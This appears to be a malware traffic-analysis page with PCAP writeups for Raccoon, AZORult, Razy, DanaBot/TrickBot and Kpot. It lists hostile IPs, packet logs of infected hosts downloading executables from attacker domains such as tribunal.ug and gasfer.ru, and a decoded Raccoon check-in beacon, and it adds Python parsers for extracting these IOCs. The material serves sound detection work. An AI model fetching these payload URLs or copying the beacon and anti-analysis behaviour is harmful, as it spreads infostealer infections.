Raccoon Crimeware Malware PCAP File Download AZORult MSILPerseus tribunal.ug

Hostile IPs: 172.217.164.131, 172.217.9.206, 172.253.63.132, 188.127.249.210, 195.201.225.248, 217.8.117.45, 34.107.4.68, 91.193.75.172, 96.6.6.64

Note that several of these (172.217.x.x, 172.253.x.x, 34.107.x.x, 96.6.x.x) fall in Google and Akamai address space and are likely background traffic from the analysis host rather than C2; check them before adding them to a blocklist. The payload download itself goes to 217.8.117.45 (tribunal.ug).

Dynamic Analysis Report
Classification: Downloader, Spyware
Threat Names: AZORult v3, Gen:Variant.MSILPerseus.224291, Trojan.GenericKD.42815195

The Range/If-Range headers in the request below mean the client is resuming a partial transfer of zxcvb.exe from byte 101892, so the file carved from this capture alone will be incomplete.

2020-05-29 20:39:31.460098 IP 10.1.10.15.49233 > 217.8.117.45.80: Flags [P.], seq 1:504, ack 1, win 16425, length 503: HTTP: GET /zxcvb.exe HTTP/1.1
GET /zxcvb.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=101892-
Unless-Modified-Since: Wed, 27 May 2020 16:24:13 GMT
If-Range: "43200-5a6a3a481cf60"
Host: tribunal.ug
Connection: Keep-Alive
2020-05-29 20:39:31.615857 IP 217.8.117.45.80 > 10.1.10.15.49233: Flags [.], […]

Razy Malware Crimeware PCAP File Download Traffic Analysis system.exe gasfer.ru

The malware attempts to download and load its dropper from 64.31.23.26, but that host is down, so the infection chain dies at this point.

Hostile IPs: 64.31.23.26, 81.177.135.143

2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
GET /system.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
[…]

DanaBot TrickBot Malware PCAP File Download Traffic Analysis 185.45.193.50 193.34.166.247

Hostile IPs: 176.123.7.51, 185.45.193.50, 193.34.166.247, 95.163.181.123
Tags: DanaBot, Gozi, Quakbot, Trickbot

The loader requests 22JUM.exe by bare IP (Host: 176.123.7.51), so no DNS lookup precedes this download and DNS-based blocking or logging will not see it. As in the tribunal.ug capture, the Range/If-Range pair marks a resumed transfer, here from byte 202587.

2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1
GET /22JUM.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202587-
Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT
If-Range: "293800-5a6d31663c571"
Host: 176.123.7.51
Connection: Keep-Alive
2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0
2020-05-29 21:10:54.846062 IP […]
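The three captures above (tribunal.ug, gasfer.ru and 176.123.7.51) show the same pattern: a loader fetching a second-stage .exe over plain HTTP, twice with Range/If-Range headers, i.e. a resumed transfer. The parser below is an added example and not part of the original posts. It pulls those download IOCs out of tcpdump -A text: it matches the per-packet summary line, tolerates the raw IP/TCP header bytes that tcpdump prints on the same line just before the request line, and reports URL, server IP, User-Agent and resume offset per executable fetch. SAMPLE_DUMP is constructed from the requests shown in the posts (headers abridged, server ACK made up) so the block runs offline.

```python
"""Extract HTTP download IOCs from tcpdump -A text (added example, not from the original posts)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Per-packet summary line as tcpdump prints it.
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)
# Request line; searched rather than anchored because -A output prints the raw
# header bytes of the segment on the same line right in front of "GET ...".
REQUEST_RE = re.compile(r"(?P<method>GET|POST|HEAD|PUT|OPTIONS) (?P<uri>/\S*) HTTP/1\.[01]\s*$")
HEADER_RE = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*):\s*(?P<value>.*)$")


@dataclass
class HttpRequest:
    ts: str
    src: str
    dst: str
    method: str
    uri: str
    headers: dict = field(default_factory=dict)  # header names lower-cased

    @property
    def url(self) -> str:
        # Fall back to the server IP when there is no Host header.
        return f"http://{self.headers.get('host', self.dst)}{self.uri}"

    @property
    def resume_offset(self) -> Optional[int]:
        """Start byte of a resumed transfer (Range: bytes=N-), or None for a fresh fetch."""
        m = re.match(r"bytes=(\d+)-", self.headers.get("range", ""))
        return int(m.group(1)) if m else None


def extract_requests(dump_text: str):
    """Walk the dump line by line, attaching request lines and headers to the packet they follow."""
    requests, pkt, cur = [], None, None
    for line in dump_text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:  # a new packet ends any request block in progress
            pkt, cur = m.groupdict(), None
            continue
        if pkt is None:
            continue
        m = REQUEST_RE.search(line)
        if m:
            cur = HttpRequest(pkt["ts"], pkt["src"], pkt["dst"], m["method"], m["uri"])
            requests.append(cur)
            continue
        if cur is None:
            continue
        m = HEADER_RE.match(line)
        if m:
            cur.headers[m["name"].lower()] = m["value"].strip()
        elif not line.strip():  # blank line closes the header block
            cur = None
    return requests


def download_iocs(dump_text: str):
    """One record per executable fetched over HTTP. A non-None offset means the transfer was
    resumed, so the capture holds only the tail of the file from that byte onward."""
    return [
        {
            "url": r.url,
            "server": r.dst,
            "offset": r.resume_offset,
            "resumed": r.resume_offset is not None,
            "user_agent": r.headers.get("user-agent", ""),
        }
        for r in extract_requests(dump_text)
        if r.method == "GET" and r.uri.lower().endswith(".exe")
    ]


# Constructed sample: the three requests from the posts with abridged headers; the server ACK is made up.
SAMPLE_DUMP = """\
2020-05-29 20:39:31.460098 IP 10.1.10.15.49233 > 217.8.117.45.80: Flags [P.], seq 1:504, ack 1, win 16425, length 503: HTTP: GET /zxcvb.exe HTTP/1.1
E..'..@.........GET /zxcvb.exe HTTP/1.1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Range: bytes=101892-
If-Range: "43200-5a6a3a481cf60"
Host: tribunal.ug
Connection: Keep-Alive

2020-05-29 20:39:31.615857 IP 217.8.117.45.80 > 10.1.10.15.49233: Flags [.], ack 504, win 237, length 0
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
E.....@.........GET /system.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: gasfer.ru
Connection: Keep-Alive

2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1
E..!..@.........GET /22JUM.exe HTTP/1.1
Range: bytes=202587-
If-Range: "293800-5a6d31663c571"
Host: 176.123.7.51
Connection: Keep-Alive
"""

if __name__ == "__main__":
    for ioc in download_iocs(SAMPLE_DUMP):
        print(ioc)
```

The offset is the caveat to remember when carving: for the two resumed fetches the capture holds only the bytes from that offset on, so a zxcvb.exe or 22JUM.exe carved from this PCAP will not hash-match the real sample unless the earlier partial transfer is also available.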

Raccoon Stealer infection Malware svchost.exe 217.8.117.89 34.89.22.128

This is the latest sample of Raccoon, an information stealer sold as malware-as-a-service: a subscription costs $200 per month. Raccoon has already infected over 100,000 devices and became one of the most mentioned malware families on underground forums in 2019. Its check-in request carries the per-host parameters base64-encoded, as the packets below show; decoded, the body reads:

echo "Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=" | base64 -d
bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null

So bot_id is a GUID with a short suffix, config_id is a 40-character hex value, and data is null in this request. Because the body is plain base64 rather than encryption, anyone with the capture can recover these identifiers and pivot on them.

2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, […]
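To do that decode in bulk rather than one echo | base64 -d at a time, here is an added example that is not the post's own tooling. It decodes a check-in body, parses the form fields and sanity-checks the two identifiers, and scans a list of request bodies for ones that qualify. It reuses the base64 body shown above as its sample input; CONSTRUCTED_BODIES adds two made-up non-beacon bodies and a padding-stripped copy. The two regexes encode only what the decoded body above shows (a GUID plus an underscore and suffix, and a 40-hex-character config_id); they are an assumption for validation, not a documented Raccoon format.

```python
"""Decode and validate base64-wrapped check-in bodies (added example, not the post's own tooling)."""
import base64
import binascii
import re
from urllib.parse import parse_qs

# The check-in body captured in the post above, reused here as sample input.
SAMPLE_BODY = "Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw="

# Assumed shapes, derived from the one decoded body shown in the post: GUID_suffix and 40 hex chars.
GUID_SUFFIX_RE = re.compile(r"^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}_[0-9A-Za-z]+$")
HEX40_RE = re.compile(r"^[0-9a-f]{40}$")


def b64_decode_lenient(s: str) -> bytes:
    """Decode standard or URL-safe base64, restoring any '=' padding the sample dropped.
    validate=True makes junk such as a plain form body fail instead of decoding to garbage."""
    s = s.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)


def decode_checkin(body: str):
    """Return the form fields (plus two sanity flags) if `body` is a base64-wrapped form
    carrying bot_id and config_id, or None if it is anything else."""
    try:
        raw = b64_decode_lenient(body).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    fields = {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}
    if "bot_id" not in fields or "config_id" not in fields:
        return None
    fields["bot_id_valid"] = bool(GUID_SUFFIX_RE.match(fields["bot_id"]))
    fields["config_id_valid"] = bool(HEX40_RE.match(fields["config_id"]))
    return fields


def find_checkins(bodies):
    """Indexes and decoded fields of the bodies that are check-ins."""
    hits = []
    for i, body in enumerate(bodies):
        fields = decode_checkin(body)
        if fields is not None:
            hits.append((i, fields))
    return hits


# Constructed scan input: the real beacon, a plain form post, harmless base64, and the beacon
# with its trailing '=' stripped (some samples and proxies drop padding).
CONSTRUCTED_BODIES = [
    SAMPLE_BODY,
    "username=admin&password=hunter2",
    "aGVsbG8gd29ybGQ=",  # base64 of "hello world": decodes, but is not a check-in
    SAMPLE_BODY.rstrip("="),
]

if __name__ == "__main__":
    for idx, fields in find_checkins(CONSTRUCTED_BODIES):
        print(idx, fields["bot_id"], fields["config_id"], fields["data"])
```

The decoded fields are what you would pivot on in other captures: the same bot_id across sessions ties them to one victim, and config_id groups victims of one build or campaign.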

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What can the Kryptik virus do?

Executable code extraction
Attempts to connect to a dead IP:Port (1 unique times)
Creates RWX memory
A process attempted to delay the analysis task
Expresses interest in specific running processes
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Performs some HTTP requests
The binary likely contains encrypted or compressed data
Detects Sandboxie through the presence of a library
Checks for the presence of known windows from debuggers and forensic tools
Attempts to repeatedly call a single API many times in order to delay analysis time
Steals private information from local Internet […]